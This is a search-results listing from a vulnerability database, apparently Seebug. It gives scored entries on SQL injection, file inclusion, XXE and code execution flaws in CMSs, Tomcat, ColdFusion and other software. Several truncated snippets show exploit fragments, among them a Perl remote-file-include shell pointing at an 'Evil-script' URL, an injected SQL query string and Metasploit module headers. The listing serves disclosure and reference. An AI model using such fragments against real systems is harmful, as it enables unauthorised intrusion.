Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2017/06/19 12:0 a.m.109 views

finecmsV5.0.8 \finecms\dayrui\controllers\Api.php getshell

Vulnerability in the C:\phpStudy\WWW\finecms\dayrui\controllers\Api. in php data2 function, approximately in the line 115, the problematic code about 178 rows public function data2 $data = array; // Route authentication if defined'SYSREFERER' && strlenSYSREFERER $http = $SERVER'HTTPREFERER' ?...

7.3AI score
Exploits0
seebug.org
seebug.org
added 2016/06/03 12:0 a.m.109 views

Digital Campus 2.0数字校园平台 /Page/ShowInfo.aspx 参数ModuleID SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/03/12 12:0 a.m.109 views

PHPEMS一处SQL注入漏洞

简要描述: PHPEMS一处SQL注入漏洞 详细说明: 6.phpems某处存在SQL注入漏洞 存在注入漏洞的代码位置是/app/exam/app.php的exercise函数中 具体代码在靠后的位置928行左右 $questionids = $this-question-selectQuestionsByKnows$args'knowsid',$args'number',$dt;//SQL注入漏洞 这里的参数$args'knowsid' 回溯898行$args = $this-ev-get'args';可以从URL控制 然后进入函数 public function...

7AI score
Exploits0
seebug.org
seebug.org
added 2013/01/09 12:0 a.m.109 views

Adobe ColdFusion 验证绕过漏洞(CVE-2013-0625)

CVE ID:CVE-2013-0625 Adobe ColdFusion是一款高效的网络应用服务器开发环境 Windows, Macintosh和UNIX下的Adobe ColdFusion存在一个安全漏洞,允许未授权用户远程绕过验证控制,控制受影响的服务器。 此漏洞仅影响没有启用密码保护或没有设置密码的ColdFusion客户 0 Adobe ColdFusion 10 Adobe ColdFusion 9.0.2 Adobe ColdFusion 9.0.1 Adobe ColdFusion 9.0 厂商解决方案...

6.8CVSS0.5AI score0.93797EPSS
Exploits5
seebug.org
seebug.org
added 2009/06/22 12:0 a.m.109 views

OpenSSL dtls1_retrieve_buffered_fragment()函数握手消息拒绝服务漏洞

BUGTRAQ ID: 35417 CVECAN ID: CVE-2009-1387 OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。 OpenSSL在接收到带有非预期序列号的握手消息时会将其传送给dtls1processoutofseqmessage函数。如果序列号低于预期值,这个函数会丢弃数据;如果为之后的消息,函数会缓冲数据。在丢弃数据时,消息碎片长度保持为0,说明没有缓冲任何数据。由于检查长度所用的错误if条件,有时会缓冲没有数据但长度为丢弃消息长度的碎片,之后在进行处理的时候会导致总线错误。 OpenSSL 0.9.x...

5CVSS0.10254EPSS
Exploits1
seebug.org
seebug.org
added 2009/04/10 12:0 a.m.109 views

Apache Tomcat mod_jk Content-Length头信息泄露漏洞

BUGTRAQ ID: 34412 CVECAN ID: CVE-2008-5519 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 如果恶意客户端向Apache Tomcat服务器的modjk模块提交了Content-Length头为空的恶意请求,或在短时间内反复提交相同的请求的话,就可以查看其他用户请求相关的响应。 Apache Group modjk 1.2.0 - 1.2.26 Apache Group ------------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://httpd.apache.org/...

2.6CVSS6.3AI score0.07263EPSS
Exploits2
seebug.org
seebug.org
added 2007/03/24 12:0 a.m.109 views

PHPRaid RSS.PHP远程文件包含漏洞

!/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// || !$cmdvusage head; while print "shell $"; while $cmd=$;...

7.5AI score
Exploits0
seebug.org
seebug.org
added 2007/03/08 12:0 a.m.109 views

PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability

No description provided by source. PostGuestbook 0.6.1tplpgbmoddirRemote File Include Expliot D.Script: http://sourceforge.net/projects/postguestbook/ Dork: "Powered by: PostGuestbook 0.6.1" Discovered by GloDM = Mahmoodali Homepage: http://www.Tryag.cc Greetz To Tryag-Team & 4lKaSrGoLd3n-Team &...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2021/07/08 12:0 a.m.108 views

IBM QRadar SIEM 服务器端请求伪造 SSRF(CVE-2020-4786)

...

4CVSS2.3AI score0.00541EPSS
Exploits1
seebug.org
seebug.org
added 2018/06/22 12:0 a.m.108 views

OurPHP 1.8 后台任意文件读取漏洞

...

0.8AI score
Exploits0
seebug.org
seebug.org
added 2017/09/15 12:0 a.m.108 views

Foscam IP Video Camera CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability(CVE-2017-2841)

Summary An exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary data in the "msmtprc" configuration file resulting...

6.5CVSS9.6AI score0.06052EPSS
Exploits1
seebug.org
seebug.org
added 2016/09/09 12:0 a.m.108 views

Adobe ColdFusion < 11 Update 10 - XML external entity injection

Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - APSB16-30 - Release date: 31.08.2016 I. VULNERABILITY Adobe ColdFusion = 11 XML External Entity XXE Injection II. BACKGROUND "Adobe ColdFusion 11 Enterprise Edition offers a single platform to rapidly build and...

6.4CVSS9.3AI score0.69044EPSS
Exploits7
seebug.org
seebug.org
added 2016/08/08 12:0 a.m.108 views

Internet Explorer 11 VBScript engine memory corruption vulnerability

No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Internet Explorer 11 VBScript Engine Memory Corruption", 'Description' = %q This module...

7.6CVSS7.8AI score0.93165EPSS
Exploits10
seebug.org
seebug.org
added 2016/02/26 12:0 a.m.108 views

泛微OA某接口无需登录可执行任意SQL语句(附脚本)

简要描述: 荒废了 啥都不会 找工作啊 详细说明: 先以本地为例 http://localhost:8088/ws http://localhost:8088/ws/query?wsdl 竟然提示 Unmarshalling Error: unexpected element uri:"http://.../", local:"arg0". Expected elements are arg1,arg0 搜索 提示是参数问题 改代码肯定是不行的 那就改参数吧 ORA-00900: 无效 sql 语句 看来是可以的 更改第一个参数 select...

7.2AI score
Exploits0
seebug.org
seebug.org
added 2014/07/21 12:0 a.m.108 views

YXcms伪造cookie绕过验证任一用户登录

简要描述: 源代码中有对cookie的加解密函数,可以伪造cookie,而且程序使用cookie进行权限验证,可以实现任一用户登录。 详细说明: Protected/apps/members/controller/indexController.php public function login if!$this-isPost//不使用post时 $cookieauth=getcookie'auth';//此时直接从cookie中获取认证信息,我们跟进getcookie函数看能否伪造cookie绕过认证 if!empty$this-auth...

7AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.108 views

Veritas NetBackup - Remote Command Execution

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.108 views

Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit

No description provided by source. !/bin/sh rspocfix.sh PoC for Postfix local root vulnerability: CVE-2008-2936 by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt [email protected] Tested: Ubuntu / Debian Madrid, 30.Aug.2008 Config writabledir=/tmp spooldir=/var/mail Use postconf mailspooldirectory...

6.2CVSS6.3AI score0.01001EPSS
Exploits6
seebug.org
seebug.org
added 2014/02/27 12:0 a.m.108 views

Apache TomcatXML外部实体信息泄漏漏洞

Bugtraq ID:65768 CVE ID:CVE-2013-4590 Apache Tomcat是一款开放源码的JSP应用服务器程序。 Apache Tomcat提供类似web.xml, context.xml, .tld, .tagx和.jspx的XML文件,允许攻击者利用漏洞进行XXE攻击,可获取Tomcat应用中的内部信息。当Tocat运行在不可信源上,如共享主机环境上受此漏洞影响。 0 Apache Tomcat 8.0.0-RC1 Apache Tomcat 7.0.0 - 7.0.42 Apache Tomcat 6.0.0 - 6.0.37 厂商补丁: Apache...

4.3CVSS8.3AI score0.09487EPSS
Exploits1
seebug.org
seebug.org
added 2013/12/16 12:0 a.m.108 views

TYPO3后端用户管理反射型跨站脚本漏洞

TYPO3是一款基于PHP4/PHP5+MYsql的内容管理系统。 TYPO3后端用户管理Backend User Administration存在反射型跨站脚本漏洞,允许远程攻击者利用漏洞构建恶意URI,诱使用户解析,当恶意数据被查看时可获取敏感信息或者劫持用户会话。 0 TYPO3 6.0.0 TYPO3 6.0.11 TYPO3 6.1.0 TYPO3 6.1.6 TYPO3 6.2 厂商补丁: TYPO3 ----- TYPO3 4.5.32, 4.7.17, 6.0.12, 6.1.7已经修复该漏洞,请到厂商的主页下载: http://typo3.org/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/11/13 12:0 a.m.108 views

discuz! x3.0 /static/image/common/focus.swf 跨站脚本漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/02/03 12:0 a.m.108 views

JBoss Enterprise Application Platform 多个安全绕过漏洞(CVE-2012-0874)

Bugtraq ID:57552 CVE ID:CVE-2012-0874 JBOSS是一个基于J2EE的开放源代码的应用服务器。 在某些配置下,允许对JMXInvokerHAServlet和EJBInvokerHAServlet invoker servlet进行未验证访问。安全拦截器第二层验证可防止直接利用此漏洞,但是如果拦截器错误配置或不正确禁用,可导致任意代码执行。 0 Red Hat JBoss Enterprise Web Platform for RHEL 5 Server 5 Red Hat JBoss Enterprise Web Platform for RHEL 4...

6.8CVSS6.1AI score0.15561EPSS
Exploits1
seebug.org
seebug.org
added 2013/02/03 12:0 a.m.108 views

Squid 'cachemgr.cgi'不完整修复远程拒绝服务漏洞

Bugtraq ID:57646 CVE ID: CVE-2013-0189 Squid是一款功能强大的代理服务器和Web缓存服务器。 Squid tools/cachemgr.cc存在多个内存泄露问题,允许远程攻击者通过提交非法Content-Length头,超长POST请求,和特制的验证凭据触发此漏洞,造成应用程序崩溃。此问题是由于未完整修复CVE-2012-5643引起的。 0 Squid 2.x Squid 3.x Squid 3.2.x Squid 3.3.x 厂商解决方案 用户可参考如下厂商提供的安全公告获得补丁信息:...

5CVSS8.1AI score0.23026EPSS
Exploits1
seebug.org
seebug.org
added 2009/03/03 12:0 a.m.108 views

Linux Kernel审计系统audit_syscall_entry()系统调用绕过安全限制漏洞

BUGTRAQ ID: 33951 Linux Kernel是开放源码操作系统Linux所使用的内核。 Syscall过滤技术通常基于由编号确定的syscall或具体参数来确认是否允许执行调用。在通过编号确定syscall时,64位Linux内核(x8664)上syscall编号可能既映射到32位又映射到64位的syscall表,而这两种syscall表是不同的。由于用户空间进程是由 syscall表控制的,因此可以绕过syscall编号检查,执行非授权操作。 例如,syscall过滤技术可能在监控64位进程,且配置为允许常见的open syscall的子集,在64位平台上为syscal...

6.8AI score
Exploits0
seebug.org
seebug.org
added 2008/10/30 12:0 a.m.108 views

Mambo Component SimpleBoard &lt;= 1.0.1 Arbitrary File Upload Exploit

No description provided by source. !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand99999 . ".php"; no int print INTRO; - SimpleBoard Mambo Component = 1.0.1 - - Remote Arbitrary File Upload Exploit - Discovered && Coded by: t0pP8uZz Discover...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/09/24 12:0 a.m.108 views

jPortal 'humor.php' SQL注入漏洞

BUGTRAQ ID: 31274 CNCAN ID:CNCAN-2008092309 jPortal是一款基于PHP的WEB应用程序。 jPortal不正确处理用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可能获得敏感信息或操作数据库。 问题由于'humor.php'脚本对用户提交给'id'参数缺少过滤,构建恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。 JPortal 2 目前没有解决方案提供: http://www.jportal.info/downloadjportal.php...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2008/02/20 12:0 a.m.108 views

NERO Media Player &lt;= 1.4.0.35b M3U File Buffer Overflow PoC

No description provided by source. NERO Media Player = 1.4.0.35b Remote Buffer Overflow .M3U This exception may be expected and handled. eax=03e90f40 ebx=41414141 ecx=009d01c8 edx=009d015c esi=03e90f38 edi=41414141 eip=7c92b3fb esp=0010bff8 ebp=0010c214 iopl=0 nv up ei pl nz ac pe nc cs=001b...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/10/31 12:0 a.m.108 views

TikiWiki Tiki-Graph_Formula.PHP白名单检查代码注入漏洞

TikiWiki是一款基于PHP、ADOdb以及smarty开发的内容管理系统/门户系统/群件系统。 TikiWiki包含的tiki-graphformula.php不正确过滤用户提交的参数,远程攻击者可以利用漏洞注入恶意PHP代码并以WEB权限执行。 TikiWiki的tiki-graphformula.php脚本使用PHP的createfunction创建匿名函数来动态计算由用户通过'f' URL参数提供的数学函数。 为了保护针对任意PHP代码的执行,TikiWiki开发者组合黑名单和白名单。一方面他们对三个字符进行黑名单过滤,另一方面用户提供的输入中只允许部分数字字符串。...

7.5CVSS0.1AI score0.76661EPSS
Exploits6
seebug.org
seebug.org
added 2018/06/14 12:0 a.m.107 views

ecshop 2.7.3 代码执行漏洞

...

0.9AI score
Exploits0
seebug.org
seebug.org
added 2018/05/10 12:0 a.m.107 views

KONGTOP DVR后门分析(CVE-2018-10734)

前言 在康拓DVR中,存在一个Telnet后门,可以导致监控设备被控制甚至内网被渗透的风险。 下面来分析一下这个后门,没有什么技术含量。 漏洞分析 后门存于在Telnetd文件中,Telnetd负责开启telnet并提供服务,在这里我们可以看到在开了Telnet服务后,对用户的连接进行了监听,如果登录的用户长时间不操作就会登录超时,然后是一系列的服务准备处理函数。 在我们启用了Telnetd服务后,也就是开启了telnet后,程序会判断启动程序是否在终端机器里面运行,如果是则进行下一步,否则就会退出,输出UNKNOW。 在通过了本机环境验证后,程序会开始提取用户的登录数据,并保存在内存中...

5CVSS9.7AI score0.01869EPSS
Exploits2
seebug.org
seebug.org
added 2016/11/17 12:0 a.m.107 views

Apache Shiro remote security restriction bypass Vulnerability, CVE-2016-6802)

Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging the use of a non-root servlet context path. shiro in the path control, the attacker can bypass the filter to access filtered path, the impact of the version shrio 1.3.2 From the above figur...

5CVSS7.6AI score0.0968EPSS
Exploits1
seebug.org
seebug.org
added 2016/01/18 12:0 a.m.107 views

Maxcms /inc/ajax.asp id参数SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/12/01 12:0 a.m.107 views

HumHub 0.11.2 and 0.20.0-beta.2 - SQL 注入漏洞

寻找SQL注入的一般步骤: 1、寻找数据输入(表单) 2、注入数据 3、检测异常响应,像HTTP的500错误,SQL报错 该过程可以借助多种工具实现自动化。 用AWVS检测出 /index.php 可能存在SQL注入。 以下地址会报SQL错误,from 字段是注入点: http://localhost/index.php?from=1'"&limit=10&mode=activity&r=space/space/stream&sguid=e9659cfc-886f-4524-94ae-1721999ad43b...

7.3AI score
Exploits0
seebug.org
seebug.org
added 2015/09/21 12:0 a.m.107 views

yxcms1.2.9任意文件删除漏洞

yxcms1.2.9版本存在任意文件删除漏洞。漏洞文件:/protected/apps/member/controller/photocontroller.php添加图集时直接获取图片列表,然后进行入库,对图集进行删除时未对删除图片的路径进行任何过滤,如果文件路径存在,就将上传的文件列表进行遍历删除,在类的初始化有个$this-uploadpath=ROOTPATH.'upload/photos/';,可以在上传时将上传路径设置为../../protected/apps/install/install.lock,进行删除时,由于判断该文件存在,所以会被删除,删除install.lock可...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.107 views

Subdreamer 3.0.1 - CMS upload Vulnerability

No description provided by source. ======================================================================================== | Title : Subdreamer.v3.0.1 cms upload Vulnerability | Author : indoushka | email : [email protected] | Home : www.h4kz.com | Web Site : | Dork : Website powered by...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.107 views

Mac OS X Sudo Password Bypass

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'shellwords' class Metasploit3...

6.9CVSS0.1AI score0.03202EPSS
Exploits8
seebug.org
seebug.org
added 2014/01/10 12:0 a.m.107 views

Java %c0%ae 安全模式绕过漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/10/11 12:0 a.m.107 views

appcms 1.3.708 /pic.php 任意文件下载漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/06/11 12:0 a.m.107 views

Apache Struts OGNL表达式注入漏洞(CVE-2013-2134)

BUGTRAQ ID: 60346 CVECAN ID: CVE-2013-2134 Struts2 是第二代基于Model-View-Controller MVC模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。 Apache Struts 2.0.0-2.3.14.3存在远程OGNL表达式注入漏洞,远程攻击者可利用此漏洞操作服务器端对象并在受影响应用上下文中执行任意命令。此漏洞源于通配符匹配错误。 0 Apache Group Struts 2.x 厂商补丁: Apache Group ------------ Apache...

9.3CVSS1.2AI score0.70211EPSS
Exploits1
seebug.org
seebug.org
added 2012/07/06 12:0 a.m.107 views

Tiki Wiki CMS Groupware 'unserialize()' PHP代码执行漏洞

Bugtraq ID: 54298 CVE ID:CVE-2012-0911 Tiki Wiki CMS Groupware是一款内容管理和协作系统。 Tiki Wiki CMS Groupware多个脚本使用用户可控的输入调用"unserialize",这可导致通过传递ad-hoc Zend Framework序列化对象来执行任意PHP代码。 0 Tiki Wiki CMS Groupware = 8.3 厂商补丁: Tiki Wiki ----- Tiki Wiki CMS Groupware 8.4已经修复此漏洞,建议用户下载使用:...

7.5CVSS0.1AI score0.62989EPSS
Exploits12
seebug.org
seebug.org
added 2009/02/26 12:0 a.m.107 views

Adobe Flash Player无效对象引用远程代码执行漏洞

BUGTRAQ ID: 33880 CVECAN ID: CVE-2009-0520 Flash Player是一款非常流行的FLASH播放器。 在处理Shockwave Flash文件时Flash Player会试图创建特定的对象及多个指向该对象的引用,之后会释放对象并删除关联的引用,但引用可能错误的仍保持指向对象。无效的对象位于未初始化的内存中,攻击者可以控制该内存区以获得执行控制权。 Adobe Flash Player 10.x 厂商补丁: Adobe ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

9.3CVSS6.4AI score0.28484EPSS
Exploits1
seebug.org
seebug.org
added 2008/11/11 12:0 a.m.107 views

VMware产品Trap Flag处理本地权限提升漏洞

BUGTRAQ ID: 32168 CVECAN ID: CVE-2008-4915 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。 VMWare在处理指令的执行时存在问题,攻击者可能利用此漏洞提升自己的权限。如果在设置了Trap Flag的情况下出现中断,正确的CPU将执行转移到中断处理器之前会清除Trap Flag。对于受影响的VMware版本,如果内核态IRET设置了Trap Flag的话,则在执行单字节INT 3指令的时候Trap Flag在模式切换后仍继续存在,这造成的结果就是如果能够导致内核通过IRET设置Trap...

6.9CVSS6.5AI score0.00408EPSS
Exploits1
seebug.org
seebug.org
added 2008/07/03 12:0 a.m.107 views

EfesTECH Shop &quot;cat_id&quot; SQL注入漏洞

BUGTRAQ ID: CNCAN ID:CNCAN-2008070303 EfesTECH Shop是一款基于ASP的WEB应用程序。 EfesTECH Shop不正确处理用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可能获得敏感信息或操作数据库。 问题是'default.asp'脚本对用户提交给'catid'参数缺少过滤,构建恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。 EfesTECH Shop 2.x 目前没有详细解决方案提供: http://www.aspindir.com/Goster/5479...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2008/05/05 12:0 a.m.107 views

BlogMe PHP (comments.php id) SQL Injection Vulnerability

No description provided by source. + BlogMe PHP remote SQL injection exploit + Script download : http://www.drumster.net/gamma/downloads/BlogMe11.zip + Founded by : His0k4 ALGERIAN HaCkEr + Greetz : All friends & muslims HaCkeRs... + Dork : "BlogMe PHP created by Gamma Scripts" + Exploit :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/03/26 12:0 a.m.107 views

PHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || // // | |/ || '|/ |/ -| ' / -/ |||| /| || / //...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/11/07 12:0 a.m.107 views

PHPGiggle 12.08 (CFG_PHPGIGGLE_ROOT) File Include Vulnerability

No description provided by source. Title : Php Giggle = 12.08 Remote File Include Vulnerability Author : ajann Vuln; File startup.php /File Code,1 startup.php Error: .. .... include$CFGPHPGIGGLEROOT . $CFGMODULEROOT . "/kernel/system/modregistry.inc.php"; include$CFGPHPGIGGLEROOT . $CFGMODULEROOT...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2021/03/31 12:0 a.m.106 views

VMware vRealize Operations Manager SSRF和文件读取漏洞(CVE-2021-21975 CVE-2021-21983)

Description On March 30, 2021, VMware published a security advisory for CVE-2021-21975 and CVE-2021-21983, two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery SSRF, while CVE-2021-21983 is an authenticated...

8.5CVSS8.1AI score0.7829EPSS
Exploits12
seebug.org
seebug.org
added 2017/11/08 12:0 a.m.106 views

Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability(CVE-2017-2922)

Summary An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which leads to a use-after-free vulnerability which can be exploited...

9.9AI score0.02625EPSS
Exploits2
seebug.org
seebug.org
added 2017/06/14 12:0 a.m.106 views

One of my first sandbox escapes and bugs (CVE-2015-1743)

Advisory link: http://www.zerodayinitiative.com/advisories/ZDI-15-377/ CVE-2015-1743 Demo: https://www.youtube.com/watch?v=6Vtl8kh6keQ Below is one of my first sandbox escapes, and my entry into vulnerability research. My first bugs relied heavily on the work that Forshaw did my later ones deviat...

7.5CVSS6.7AI score0.13736EPSS
Exploits1
seebug.org
seebug.org
added 2016/12/30 12:0 a.m.106 views

SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)

DESCRIPTION ------------------------- SwiftMailer class uses PHP mail function as its default transport. SwiftMailer suffers from the same vulnerability as the one disclosed in PHPMailer in the advisory at:...

7.5CVSS10.3AI score0.99714EPSS
Exploits66
seebug.org
seebug.org
added 2016/03/18 12:0 a.m.106 views

phpMyWind v5.3 /goodsshow.php 代码执行

No description provided by source...

7.1AI score
Exploits0
Total number of security vulnerabilities5000